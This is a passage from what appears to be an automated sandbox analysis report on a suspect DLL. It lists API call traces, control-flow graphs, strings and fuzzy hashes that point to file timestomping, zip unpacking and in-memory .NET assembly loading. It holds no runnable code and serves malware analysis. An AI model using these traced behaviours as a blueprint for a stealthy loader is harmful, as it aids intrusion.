                                      • _sprintf.LIBCMT ref: 6E33913D
                                      • _sprintf.LIBCMT ref: 6E339165
                                      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 6E33919B
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 6E339224
                                      • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 6E339270
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 6E33927C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                      • String ID: %s%s$%s%s%s$:$\$text.e
                                      • API String ID: 3001508280-3719898479
                                      • Opcode ID: 46b5f651838acef0a82f35896d9e7b0640114f3f06df1f27ba2fb748ef26d20b
                                      • Instruction ID: c4267a7d7219b999247aee7379be7d4a2e23963f50922df2d3354fbd5c46ef70
                                      • Opcode Fuzzy Hash: 46b5f651838acef0a82f35896d9e7b0640114f3f06df1f27ba2fb748ef26d20b
                                      • Instruction Fuzzy Hash: 3491CC719006BCDFDB61CE94CC84FDABBB8AB09319F2005D6E658A6284DB715AC48F91

                                      Control-flow Graph

                                      APIs
                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 6E332CB5
                                      • _memset.LIBCMT ref: 6E332CDE
                                      • Sleep.KERNEL32(00000001), ref: 6E332D00
                                      • _malloc.LIBCMT ref: 6E332D3C
                                      • _memset.LIBCMT ref: 6E332D69
                                      • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 6E332D81
                                      • _free.LIBCMT ref: 6E332D88
                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6E332DB0
                                      • FlushFileBuffers.KERNEL32(?), ref: 6E332DBC
                                      • CloseHandle.KERNEL32(?), ref: 6E332DC8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                      • String ID: FileSystem_$Stdio.dll
                                      • API String ID: 1923221151-1097674003
                                      • Opcode ID: 2c7908cab6c09c8e9e40e86f8fb0b550c7f316f89bcde3fb5e4a47b7432bcce8
                                      • Instruction ID: 99215b21c561b3d5bb7e33bdadc102ed58e1c68dd36546a45cf681a82ae7380e
                                      • Opcode Fuzzy Hash: 2c7908cab6c09c8e9e40e86f8fb0b550c7f316f89bcde3fb5e4a47b7432bcce8
                                      • Instruction Fuzzy Hash: D831AF72900568AFDF219FA48C84FEABBBDEB55304F1004D5F598AB150DBB15EC58FA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1009 6e333007-6e333030 call 6e343ed7 CLRCreateInstance 1012 6e333036-6e333052 1009->1012 1013 6e3330bd 1009->1013 1012->1013 1017 6e333054-6e333063 1012->1017 1014 6e3330bf-6e3330c4 call 6e343f76 1013->1014 1017->1013 1020 6e333065-6e333068 1017->1020 1020->1013 1021 6e33306a-6e333086 1020->1021 1021->1013 1023 6e333088-6e333093 1021->1023 1023->1013 1025 6e333095-6e3330aa 1023->1025 1027 6e3330c5-6e3330d1 1025->1027 1028 6e3330ac-6e3330b5 1025->1028 1030 6e3330d3-6e3330d8 call 6e33a8c0 1027->1030 1031 6e3330dd-6e3330f0 1027->1031 1028->1013 1029 6e3330b7-6e3330b9 1028->1029 1029->1013 1030->1031 1034 6e3330f2-6e3330fa 1031->1034 1035 6e333104-6e333134 SafeArrayCreate SafeArrayAccessData 1031->1035 1034->1028 1036 6e3330fc-6e333102 1034->1036 1037 6e333136-6e33313f 1035->1037 1038 6e333149-6e333163 call 6e343300 SafeArrayUnaccessData 1035->1038 1036->1028 1037->1034 1039 6e333141-6e333147 1037->1039 1038->1037 1044 6e333165-6e33316a 1038->1044 1039->1034 1044->1030 1045 6e333170-6e333175 1044->1045 1046 6e333177-6e333179 1045->1046 1047 6e33317d-6e333192 1045->1047 1046->1047 1047->1037 1049 6e333194-6e3331a0 1047->1049 1049->1030 1050 6e3331a6-6e3331b5 1049->1050 1052 6e3331d1-6e33324a SafeArrayCreate SysAllocString SafeArrayPutElement SafeArrayCreate SafeArrayPutElement 1050->1052 1053 6e3331b7-6e3331bb 1050->1053 1052->1030 1055 6e333250-6e333273 1052->1055 1054 6e3331be-6e3331c0 1053->1054 1054->1037 1056 6e3331c6-6e3331cc 1054->1056 1055->1054 1058 6e333279-6e33327b 1055->1058 1056->1037 1060 6e333283-6e33328c 1058->1060 1061 6e33327d-6e33327f 1058->1061 1062 6e333294-6e33329c 1060->1062 1063 6e33328e-6e333290 1060->1063 1061->1060 1064 6e3332a4-6e3332ad 1062->1064 1065 6e33329e-6e3332a0 1062->1065 1063->1062 1066 6e3332b5-6e3332b8 1064->1066 1067 6e3332af-6e3332b1 1064->1067 1065->1064 1066->1014 1067->1066
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 6E33300E
                                      • CLRCreateInstance.MSCOREE(6E34A868,6E34A858,?), ref: 6E333028
                                      • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 6E33311F
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6E33312C
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 6E33315B
                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 6E333202
                                      • SysAllocString.OLEAUT32(?), ref: 6E33320D
                                      • SafeArrayPutElement.OLEAUT32(?,?,00000000), ref: 6E333221
                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 6E333233
                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6E333243
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Create$DataElement$AccessAllocH_prolog3InstanceStringUnaccess
                                      • String ID: v4.0.30319
                                      • API String ID: 3719805069-3152434051
                                      • Opcode ID: a9bd67f9681051b6f64482844419743b7b4ae4dd74c11c28a09a9c1103358ec4
                                      • Instruction ID: fd8c551e8d04c836b01476b6bb5e0230e49ea1ee2a4ff35b5148003a392615c5
                                      • Opcode Fuzzy Hash: a9bd67f9681051b6f64482844419743b7b4ae4dd74c11c28a09a9c1103358ec4
                                      • Instruction Fuzzy Hash: 42A10671E0029AEFDB00DFE4C888DAEBBB9FF49304F608469E126EB251D7359945CB51

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1068 6e33a740-6e33a77d 1069 6e33a786-6e33a7aa lstrlenA MultiByteToWideChar 1068->1069 1070 6e33a77f-6e33a781 1068->1070 1072 6e33a7c6-6e33a7d6 1069->1072 1073 6e33a7ac-6e33a7b4 GetLastError 1069->1073 1071 6e33a89a-6e33a8ae 1070->1071 1074 6e33a8b0 call 6e33a9d1 1071->1074 1077 6e33a7f0 1072->1077 1078 6e33a7d8-6e33a7ee call 6e33c3b0 1072->1078 1075 6e33a7c0-6e33a7c1 call 6e33a8c0 1073->1075 1076 6e33a7b6-6e33a7bb 1073->1076 1079 6e33a8b5-6e33a8b8 1074->1079 1075->1072 1076->1075 1082 6e33a7f1 call 6e33b16b 1077->1082 1085 6e33a822-6e33a824 1078->1085 1084 6e33a7f6-6e33a805 1082->1084 1084->1085 1086 6e33a830-6e33a843 MultiByteToWideChar 1085->1086 1087 6e33a826-6e33a82b call 6e33a8c0 1085->1087 1088 6e33a870-6e33a87f SysAllocString 1086->1088 1089 6e33a845-6e33a84b 1086->1089 1087->1086 1093 6e33a881-6e33a887 call 6e33b131 1088->1093 1094 6e33a88a-6e33a88c 1088->1094 1091 6e33a856-6e33a85e GetLastError 1089->1091 1092 6e33a84d-6e33a853 call 6e33b131 1089->1092 1096 6e33a860-6e33a865 1091->1096 1097 6e33a86a-6e33a86b call 6e33a8c0 1091->1097 1092->1091 1093->1094 1099 6e33a898 1094->1099 1100 6e33a88e-6e33a893 call 6e33a8c0 1094->1100 1096->1097 1097->1088 1099->1071 1100->1099
                                      APIs
                                      • lstrlenA.KERNEL32(T%3n,FFA48B4B,?,00000000,00000000,?,6E3316A6,?,00000004,6E332554,?), ref: 6E33A787
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,T%3n,00000001,00000000,00000000,?,6E3316A6,?,00000004,6E332554,?), ref: 6E33A79D
                                      • GetLastError.KERNEL32(?,6E3316A6,?,00000004,6E332554,?), ref: 6E33A7AC
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,6E332554,00000001,00000000,00000000,?,?,6E3316A6,?,00000004,6E332554), ref: 6E33A83B
                                      • _free.LIBCMT ref: 6E33A84E
                                      • GetLastError.KERNEL32(?,?,6E3316A6,?,00000004,6E332554), ref: 6E33A856
                                      • SysAllocString.OLEAUT32(00000000), ref: 6E33A871
                                      • _free.LIBCMT ref: 6E33A882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                      • String ID: T%3n$T%3n
                                      • API String ID: 2233872252-3281847638
                                      • Opcode ID: 6cc31b840bf7d2dbced7dc66eada15a899b75debee9340120a430e31564852a1
                                      • Instruction ID: c278c347bb122ae8c9e4e9aa3c3d98626bc1c1c583219ef83574d9133cfd6923
                                      • Opcode Fuzzy Hash: 6cc31b840bf7d2dbced7dc66eada15a899b75debee9340120a430e31564852a1
                                      • Instruction Fuzzy Hash: 9941C472D106A5ABDB109FE48C45FEFBBBCEB44754F300529F815AB280E73998018AE1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1105 6e339cf8-6e339d4f call 6e343f40 call 6e33a134 1110 6e339d51 1105->1110 1111 6e339d54-6e339d5a 1105->1111 1110->1111 1112 6e339d5f-6e339d72 call 6e3392b1 1111->1112 1113 6e339d5c 1111->1113 1116 6e339da2-6e339daf 1112->1116 1117 6e339d74-6e339d7a 1112->1117 1113->1112 1120 6e339db1 1116->1120 1121 6e339db4-6e339db7 1116->1121 1118 6e339d7f-6e339d85 1117->1118 1119 6e339d7c 1117->1119 1122 6e339d87 1118->1122 1123 6e339d8a-6e339d9d wsprintfA 1118->1123 1119->1118 1120->1121 1124 6e339de3-6e339df3 call 6e338826 1121->1124 1125 6e339db9 1121->1125 1122->1123 1127 6e33a0c1-6e33a0c4 1123->1127 1128 6e339dc3 1124->1128 1133 6e339df5-6e339e07 call 6e33935a 1124->1133 1125->1128 1130 6e33a0c6 1127->1130 1131 6e33a0c9-6e33a133 OutputDebugStringA call 6e33a1fb call 6e33578c call 6e3357c7 call 6e33578c * 5 call 6e343f8a 1127->1131 1132 6e339dc9-6e339dd1 1128->1132 1130->1131 1135 6e339dd7-6e339dde call 6e3393c4 1132->1135 1136 6e33a095 call 6e339c00 1132->1136 1133->1128 1147 6e339e09-6e339e1d 1133->1147 1144 6e33a09a-6e33a0a1 1135->1144 1136->1144 1145 6e33a0a3 1144->1145 1146 6e33a0a6-6e33a0bd wsprintfA 1144->1146 1145->1146 1146->1127 1147->1132 1149 6e339e1f-6e339e4e call 6e33b484 call 6e33935a 1147->1149 1159 6e339e50 1149->1159 1160 6e339e56-6e339e7c call 6e339c41 1149->1160 1159->1160 1167 6e339e82-6e339f47 call 6e335660 call 6e33a15e call 6e33a1b5 call 6e33a29a call 6e33578c call 6e33a1b5 call 6e33a29a call 6e33578c 1160->1167 1168 6e33a08b-6e33a090 call 6e33a6c5 1160->1168 1191 6e339f49 1167->1191 1192 6e339f4c-6e339f52 1167->1192 1168->1136 1191->1192 1193 6e339f57-6e339f5b 1192->1193 1194 6e339f54 1192->1194 1195 6e339f77-6e339f79 1193->1195 1196 6e339f5d-6e339f5f 1193->1196 1194->1193 1199 6e339f7c-6e339f7e 1195->1199 1197 6e339f73-6e339f75 1196->1197 1198 6e339f61-6e339f67 1196->1198 1197->1199 1198->1195 1200 6e339f69-6e339f71 1198->1200 1201 6e339f84-6e339f87 1199->1201 1202 6e33a01a-6e33a046 call 6e33578c * 3 1199->1202 1200->1193 1200->1197 1201->1202 1204 6e339f8d-6e339f93 1201->1204 1218 6e33a054-6e33a080 1202->1218 1219 6e33a048-6e33a053 call 6e33b57f 1202->1219 1206 6e339f95 1204->1206 1207 6e339f98-6e339fc1 call 6e335660 call 6e33a22f 1204->1207 1206->1207 1216 6e339fc3 1207->1216 1217 6e339fc6-6e339fcc 1207->1217 1216->1217 1220 6e339fd1-6e339fe7 call 6e339395 1217->1220 1221 6e339fce 1217->1221 1218->1149 1223 6e33a086 1218->1223 1219->1218 1227 6e339fe9-6e339fee 1220->1227 1228 6e33a00c-6e33a015 call 6e33578c 1220->1228 1221->1220 1223->1132 1227->1228 1229 6e339ff0-6e339ff5 1227->1229 1228->1202 1229->1228 1231 6e339ff7-6e339ffc 1229->1231 1231->1228 1232 6e339ffe-6e33a003 1231->1232 1232->1228 1233 6e33a005 1232->1233 1233->1228
                                      APIs
                                      • __EH_prolog3_GS.LIBCMT ref: 6E339D02
                                      • wsprintfA.USER32 ref: 6E339D91
                                      • wsprintfA.USER32 ref: 6E33A0B4
                                        • Part of subcall function 6E338826: __fassign.LIBCMT ref: 6E338839
                                      • _wprintf.LIBCMT ref: 6E339E30
                                      • std::_Xinvalid_argument.LIBCPMT ref: 6E33A090
                                      • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,6E347020,000000FF), ref: 6E33A0CA
                                      Strings
                                      • UnPackZipToPath, success(%d), xrefs: 6E33A0AE
                                      • invalid vector<T> subscript, xrefs: 6E33A08B
                                      • %i-%i, xrefs: 6E339E2B
                                      • UnPackZipToPath failed, open zip(%s) failed, xrefs: 6E339D8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                      • String ID: %i-%i$UnPackZipToPath failed, open zip(%s) failed$UnPackZipToPath, success(%d)$invalid vector<T> subscript
                                      • API String ID: 2279894289-2550939738
                                      • Opcode ID: 453eb62baa259578f5e16268116fc0a0a84f414856a710fa794073c4c41d3301
                                      • Instruction ID: 2350da3c70bcaae28e79acac415135094e10f1016c9c4f211c0352de2e1fcbcb
                                      • Opcode Fuzzy Hash: 453eb62baa259578f5e16268116fc0a0a84f414856a710fa794073c4c41d3301
                                      • Instruction Fuzzy Hash: B9C14771D142A9DFDF22DFA4C880ACDBBB8BF04305F6045AAE459AB241DB319B85CF51
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 6E332E96
                                      • CoInitialize.OLE32(00000000), ref: 6E332E9D
                                      • CoCreateInstance.OLE32(6E34CAFC,00000000,00000001,6E34CAEC,?), ref: 6E332EBF
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 6E332F7D
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6E332F90
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6E332F9F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
                                      • String ID:
                                      • API String ID: 1776067534-0
                                      • Opcode ID: de12ee55a9e76f47173295de7a1dc9d95e7418a25aa524766daf1de2bf878f93
                                      • Instruction ID: 8988e2bf72d34319f2b451d5f0643809e343286be37d95ba54423a017b55c862
                                      • Opcode Fuzzy Hash: de12ee55a9e76f47173295de7a1dc9d95e7418a25aa524766daf1de2bf878f93
                                      • Instruction Fuzzy Hash: 78514D75A0065AEFEF01EFA4C988EAEBBB9EF46304F204455F901EB210DB719901CB90
                                      APIs
                                      • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 6E338E69
                                      • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 6E338E7D
                                      • __fassign.LIBCMT ref: 6E338E30
                                        • Part of subcall function 6E33BAFB: __mbsnbcpy_l.LIBCMT ref: 6E33BB0B
                                      • __fassign.LIBCMT ref: 6E338EE8
                                      • __fassign.LIBCMT ref: 6E338F17
                                      • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 6E338F2A
                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 6E338F3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                      • String ID:
                                      • API String ID: 2854908881-0
                                      • Opcode ID: ca367847183ac1376dff10de3e1157aeba7893db1b9de9a2c29c4c1d7366c4e3
                                      • Instruction ID: 4a0ce66818890f1ce0de1257b099ee6cd76df1f313ce6e225dcf5bf86d631a91
                                      • Opcode Fuzzy Hash: ca367847183ac1376dff10de3e1157aeba7893db1b9de9a2c29c4c1d7366c4e3
                                      • Instruction Fuzzy Hash: F541D6759042989EDF40DBA49C88FDAB7BD9F45304F6006E6E9E4D31C1DBB58A88CB90
                                      APIs
                                      • _malloc.LIBCMT ref: 6E343C94
                                        • Part of subcall function 6E33B16B: __FF_MSGBANNER.LIBCMT ref: 6E33B184
                                        • Part of subcall function 6E33B16B: __NMSG_WRITE.LIBCMT ref: 6E33B18B
                                        • Part of subcall function 6E33B16B: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6E33FCB4,00000000,00000001,00000000,?,6E33F3FD,00000018,6E34D360,0000000C,6E33F48D), ref: 6E33B1B0
                                      • _free.LIBCMT ref: 6E343CA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID: lp4n
                                      • API String ID: 2734353464-358957151
                                      • Opcode ID: 63f54a1c41ca1b2e9f8a2f18ee516f0c29ba38ce05999ccd9307f77937fa7770
                                      • Instruction ID: 02129f4b814904b67b1d3810a708bb3c9f945b48671e1c6f7f271018ec5df621
                                      • Opcode Fuzzy Hash: 63f54a1c41ca1b2e9f8a2f18ee516f0c29ba38ce05999ccd9307f77937fa7770
                                      • Instruction Fuzzy Hash: 1F11AB32958A65EBCB112FF5990CE8A37FDAF413A4F304835F89997194DF31CC418A90
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,6E332554,00000001,00000000,00000000,?,?,6E3316A6,?,00000004,6E332554), ref: 6E33A83B
                                      • _free.LIBCMT ref: 6E33A84E
                                      • GetLastError.KERNEL32(?,?,6E3316A6,?,00000004,6E332554), ref: 6E33A856
                                      • SysAllocString.OLEAUT32(00000000), ref: 6E33A871
                                      • _free.LIBCMT ref: 6E33A882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                      • String ID: T%3n
                                      • API String ID: 3133011222-97315469
                                      • Opcode ID: e0049a756c8e3eeabd1ee36e5d80015baf90c6c470cc6e4c10555945d70b5f09
                                      • Instruction ID: f0627ed3a5fb530e3ec22b578e914ca61e84f172ca353bf33fee09da1fa4f223
                                      • Opcode Fuzzy Hash: e0049a756c8e3eeabd1ee36e5d80015baf90c6c470cc6e4c10555945d70b5f09
                                      • Instruction Fuzzy Hash: FA11CA72E002A59ADF105BE08C41FEEBB7CEF44355F300539E959BB640DB399851CA94
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E34D2F0,00000008,6E33E684,00000000,00000000,?,6E33FCB4,00000000,00000001,00000000,?,6E33F3FD,00000018,6E34D360,0000000C), ref: 6E33E58D
                                      • __lock.LIBCMT ref: 6E33E5C1
                                        • Part of subcall function 6E33F472: __mtinitlocknum.LIBCMT ref: 6E33F488
                                        • Part of subcall function 6E33F472: __amsg_exit.LIBCMT ref: 6E33F494
                                        • Part of subcall function 6E33F472: EnterCriticalSection.KERNEL32(00000000,00000000,?,6E33E754,0000000D,6E34D318,00000008,6E33E84B,00000000,?,6E33C0A2,00000000,6E34D230,00000008,6E33C107,?), ref: 6E33F49C
                                      • InterlockedIncrement.KERNEL32(?), ref: 6E33E5CE
                                      • __lock.LIBCMT ref: 6E33E5E2
                                      • ___addlocaleref.LIBCMT ref: 6E33E600
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: f85bbc116a617ee9e8803c61b970d379f9dd833e3ffd827a5df208b9c620e8f8
                                      • Instruction ID: 542a6bea8a0c28e2b17a50f91b4a2da6adaa49f7d2830012942c56c2941f2c73
                                      • Opcode Fuzzy Hash: f85bbc116a617ee9e8803c61b970d379f9dd833e3ffd827a5df208b9c620e8f8
                                      • Instruction Fuzzy Hash: F6016D71800B90DAE7209FAAC405B89FBE4AF11328F708D0EE4D6967A0CB75AA44CF51
                                      APIs
                                      • __getptd.LIBCMT ref: 6E34082D
                                        • Part of subcall function 6E33E6A9: __getptd_noexit.LIBCMT ref: 6E33E6AC
                                        • Part of subcall function 6E33E6A9: __amsg_exit.LIBCMT ref: 6E33E6B9
                                      • __getptd.LIBCMT ref: 6E34083E
                                      • __getptd.LIBCMT ref: 6E34084C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
                                      • Associated: 00000000.00000002.2900241726.000000006E330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900566258.000000006E350000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2900614569.000000006E354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e330000_loaddll32.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 9c0a63370ed740ef4d4d63add8872ef42593bc28f3e908dba1f6de5ac727ead9
                                      • Instruction ID: 4862e95fa1d46684c7e389e9edcb918125e260963100e1be2dfd49540e99635f
                                      • Opcode Fuzzy Hash: 9c0a63370ed740ef4d4d63add8872ef42593bc28f3e908dba1f6de5ac727ead9
                                      • Instruction Fuzzy Hash: 48E09234700344CFC7408BE5D145FA832E8AF84218F3648A5D44CC7221D779D880CE83
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 6E331050
                                      • CoCreateInstance.OLE32(6E348278,00000000,00000001,6E348268,?), ref: 6E331072
                                      • lstrlenA.KERNEL32 ref: 6E3310AB
                                      • _memset.LIBCMT ref: 6E3310E0
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 6E3310FF
                                      • CoUninitialize.OLE32 ref: 6E331131
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2900320273.000000006E331000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E330000, based on PE: true
